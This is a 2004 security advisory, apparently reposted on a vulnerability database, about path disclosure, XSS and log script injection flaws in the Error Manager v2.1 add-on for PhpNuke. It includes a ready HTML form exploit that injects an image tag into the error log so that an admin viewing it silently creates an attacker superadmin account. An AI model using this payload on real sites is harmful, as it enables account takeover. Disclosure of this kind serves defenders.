Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

waraxe-2004-SA010.txt

🗓️ 18 Mar 2004 00:00:00Reported by Janek Vind aka waraxeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Multiple vulnerabilities in Error Manager v2.1 for PhpNuke include path disclosure and XSS.

Code
`  
{===============================================================================  
=}  
{ [waraxe-2004-SA#010]   
}  
{===============================================================================  
=}  
{   
}  
{ [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ]   
}  
{   
}  
{===============================================================================  
=}  
  
  
Author: Janek Vind "waraxe"  
Date: 18. March 2004  
Location: Estonia, Tartu  
  
  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
>From developer's readme file:  
  
This Error Manager is made by Gijza.net  
The idea came from DR3N.tk  
This addon is made for PHP-NUKE 6.0. but may work for other versions  
Admin CP is also included in this version.  
For the latest version go to www.gijza.net  
  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1. Full path disclosure   
  
  
Let's look at original code:  
  
//language  
if( isset( $newlang ) ) {  
include( "language/error/lang-$newlang.php" );  
$language = $newlang;  
} elseif ( isset( $lang ) ) {  
include( "language/error/lang-$lang.php" );  
$language = $lang;  
} else {  
include( "language/error/lang-$language.php" );  
}  
  
So - nothing will stop us to request this php file directly and this can lead to  
standard php error messages, revealing us the full path to error.php file:  
  
http://localhost/nuke71/error.php?newlang=foobar  
  
Warning: main(language/error/lang-foobar.php): failed to open stream: No such fi  
le or directory in D:\apache_wwwroot\nuke71\error.php on line 19  
  
  
  
2. Cross-Site Scripting aka XSS  
  
  
Again, let's look at original code:  
  
  
if ($error == 401) {  
$pagetitle = "- "._EM401."";  
}  
if ($error == 403) {  
$pagetitle = "- "._EM403."";  
}  
if ($error == 404) {  
$pagetitle = "- "._EM404."";  
}  
if ($error == 500) {  
$pagetitle = "- "._EM500."";  
}  
  
  
This is traditionally coded by using the "switch/case" language constructions, b  
ut  
for some reason the author uses there "if/if/if/..." construction, not even "if/  
elseif/elseif/else".  
And we can see, that if variable $error is not the 401, 403, 404 or 500, but som  
ething else, then  
we can UNINITIALIZED $pagetitle set to any value. This will lead of course to X  
SS conditions:  
  
http://localhost/nuke71/error.php?pagetitle=[xss code here]  
  
  
One more way to XSS exploiting:  
  
  
http://localhost/nuke71/error.php?error=>[xss code here]  
  
  
As with all the PhpNuke XSS cases, using of the POST parameters or even better -  
COOKIE parameters -   
will be preffered, because the GET parameters are strictly filtered in mainfile.  
php .  
  
  
  
3. Script injection to error log (nasty one!)  
  
  
This one is my favourite bug. I mean - Error Manager is suppose to log the error  
conditions in web server  
and therefore admin can find potential bugs on site and of course this logging f  
eature will reveale to  
admin many (unsuccessful) attacks by "bad guys". It's shame, but it's true - err  
or logging in Error Manager  
will log referer, request URI , etc, but WITHOUT ANY sanityze against html tags   
;)  
So we can inject any javascript code to error log and when admin will browse the  
logs, the website can be  
compromised - for example cookies can be stealed, additional superadmin accounts  
can be created without the  
knowledge of the admin (refference to [waraxe-2004-SA#008 - easy way to get supe  
radmin rights in PhpNuke 6.x-7.1.0]) etc ...  
  
So, there is an attack scenario:  
  
Write the html file like this one -   
  
  
<HTML>  
<HEAD><TITLE>Error Manager sploit</TITLE>  
</HEAD>  
<BODY bgcolor="#000000" text="#FFFFFF">  
<br><br><br>  
<center>  
  
<FORM action="http://www.victim.com/error.php" method="POST">  
  
<input type="hidden" name="error" value="<img width='0' height='0' border='0' sr  
c='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&ad  
d_pwd=coolpass&[email protected]&add_radminsuper=1'></img>404">  
<input type="submit" value="Attack">  
  
</FORM>  
  
</center>  
<br><br><br>  
  
</BODY>  
</HTML>  
  
  
Use it aginst victim server and then just wait, till admin reads the error log a  
nd then  
login to your brand new superadmin account ;)  
  
  
  
  
Greetings:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Greets to torufoorum staff and to all IT security related people in Estonia!  
Tervitused!  
Special greets to ulljobu!  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[email protected]  
Janek Vind "waraxe"  
  
---------------------------------- [ EOF ] ------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Mar 2004 00:00Current
vulnerabilities in error managerfull path disclosurecross site scriptingphpnuke 6.0
29